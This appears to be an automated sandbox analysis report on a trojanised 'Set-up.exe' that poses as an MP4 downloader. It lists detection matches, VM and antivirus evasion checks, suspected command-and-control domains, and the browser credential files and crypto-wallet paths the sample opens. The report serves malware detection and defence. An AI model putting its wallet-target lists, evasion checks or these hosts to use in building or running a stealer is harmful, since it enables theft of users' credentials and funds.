              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: 'Set-up.exe | String found in binary or memory: https://vivporn.com/wp-content/plugins/
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: 'Set-up.exe | String found in binary or memory: https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//&
              Source: 'Set-up.exe | String found in binary or memory: https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevar
              Source: 'Set-up.exe | String found in binary or memory: https://www.google.com/Google
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 'Set-up.exe | String found in binary or memory: https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc=
              Source: 'Set-up.exe | String found in binary or memory: https://www.hotmovs.com/
              Source: 'Set-up.exe | String found in binary or memory: https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile
              Source: 'Set-up.exe, 00000000.00000003.2388398991.000000000377D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
              Source: 'Set-up.exe, 00000000.00000003.2388398991.000000000377D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 'Set-up.exe | String found in binary or memory: https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id=
              Source: 'Set-up.exe | String found in binary or memory: https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla.
              Source: 'Set-up.exe | String found in binary or memory: https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.
              Source: 'Set-up.exe | String found in binary or memory: https://www.tomabo.com/mp4-player/download.html
              Source: 'Set-up.exe | String found in binary or memory: https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c
              Source: 'Set-up.exe | String found in binary or memory: https://www.tomabo.com/videos/dog-and-balls.mp4Please
              Source: 'Set-up.exe | String found in binary or memory: https://www.tomabo.comVersion
              Source: 'Set-up.exe | String found in binary or memory: https://www.txxx.com/
              Source: 'Set-up.exe | String found in binary or memory: https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%
              Source: 'Set-up.exe | String found in binary or memory: https://www.yahoo.com/Yahoo
              Source: 'Set-up.exe | String found in binary or memory: https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type:
              Source: 'Set-up.exe | String found in binary or memory: https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.c
              Source: 'Set-up.exe | String found in binary or memory: https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManife
              Source: 'Set-up.exe | String found in binary or memory: https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease
              Source: 'Set-up.exe | String found in binary or memory: https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-Idcontinuationclic
              Source: 'Set-up.exe | String found in binary or memory: https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Y
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49769 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49778 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49788 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49799 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49851 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49864 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49875 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49884 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0094E95E
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0094E970
              Source: 'Set-up.exe | Static PE information: invalid certificate
              Source: 'Set-up.exe, 00000000.00000002.2458589159.000000000067F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMP4Downloader.EXE vs 'Set-up.exe
              Source: 'Set-up.exe, 00000000.00000003.2254678691.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMP4Downloader.EXE vs 'Set-up.exe
              Source: 'Set-up.exe | Binary or memory string: OriginalFilenameMP4Downloader.EXE vs 'Set-up.exe
              Source: 'Set-up.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: 'Set-up.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\'Set-up.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 'Set-up.exe, 00000000.00000003.2302381104.0000000003775000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2302495931.0000000003768000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290838605.0000000003774000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2291298453.0000000003756000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 'Set-up.exe | Virustotal: Detection: 18%
              Source: 'Set-up.exe | ReversingLabs: Detection: 18%
              Source: C:\Users\user\Desktop\'Set-up.exe | File read: C:\Users\user\Desktop\'Set-up.exe
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: oledlg.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\'Set-up.exe | Section loaded: profapi.dll
              Source: 'Set-up.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: 'Set-up.exe | Static file information: File size 76577172 > 1048576
              Source: 'Set-up.exe | Static PE information: section name: RT_CURSOR
              Source: 'Set-up.exe | Static PE information: section name: RT_BITMAP
              Source: 'Set-up.exe | Static PE information: section name: RT_ICON
              Source: 'Set-up.exe | Static PE information: section name: RT_MENU
              Source: 'Set-up.exe | Static PE information: section name: RT_DIALOG
              Source: 'Set-up.exe | Static PE information: section name: RT_STRING
              Source: 'Set-up.exe | Static PE information: section name: RT_ACCELERATOR
              Source: 'Set-up.exe | Static PE information: section name: RT_GROUP_ICON
              Source: 'Set-up.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x174000
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0374AF6D push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0374B340 push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0374CE24 pushad ; ret 0_3_0374CE3D
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0374B2BC push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_00994913 pushfd ; retf 0068h 0_3_0099492A
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0092CBA2 push esp; retf 0_3_0092CC00
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_009310AE push eax; retf 0_3_00931191
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0093B613 push es; ret 0_3_0093B6F9
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0092CB52 push eax; retf 0_3_0092CB61
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0092CF70 pushad ; iretd 0_3_0092CF71
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0092CB62 pushad ; retf 0_3_0092CB71
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0092CF60 push eax; iretd 0_3_0092CF61
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0094E138 push eax; iretd 0_3_0094E139
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_0095312C push esp; retf 0_3_00953131
              Source: C:\Users\user\Desktop\'Set-up.exe | Code function: 0_3_009470C7 push C8050000h; ret 0_3_009470D0
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\'Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\'Set-up.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\'Set-up.exe TID: 3088 | Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\'Set-up.exe TID: 2996 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\'Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: 'Set-up.exe, 'Set-up.exe, 00000000.00000003.2458003560.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458846850.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430635744.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458113896.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458916538.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419615846.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289458694.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430843387.000000000092E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.000000000379B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\'Set-up.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: passhudmrue.click
              Source: C:\Users\user\Desktop\'Set-up.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\'Set-up.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: 'Set-up.exe, 00000000.00000003.2458003560.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430635744.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458864912.0000000000917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\'Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: 'Set-up.exe PID: 3940, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: 'Set-up.exe | String found in binary or memory: *electrum*
              Source: 'Set-up.exe | String found in binary or memory: %appdata%\ElectronCash\wallets
              Source: 'Set-up.exe | String found in binary or memory: Wallets/JAXX New Version
              Source: 'Set-up.exe | String found in binary or memory: window-state.json
              Source: 'Set-up.exe | String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: 'Set-up.exe | String found in binary or memory: *exodus*
              Source: 'Set-up.exe | String found in binary or memory: *ethereum*
              Source: 'Set-up.exe, 00000000.00000003.2419404613.0000000000990000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: 'Set-up.exe, 00000000.00000003.2419642946.00000000009A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: o","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p"86
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
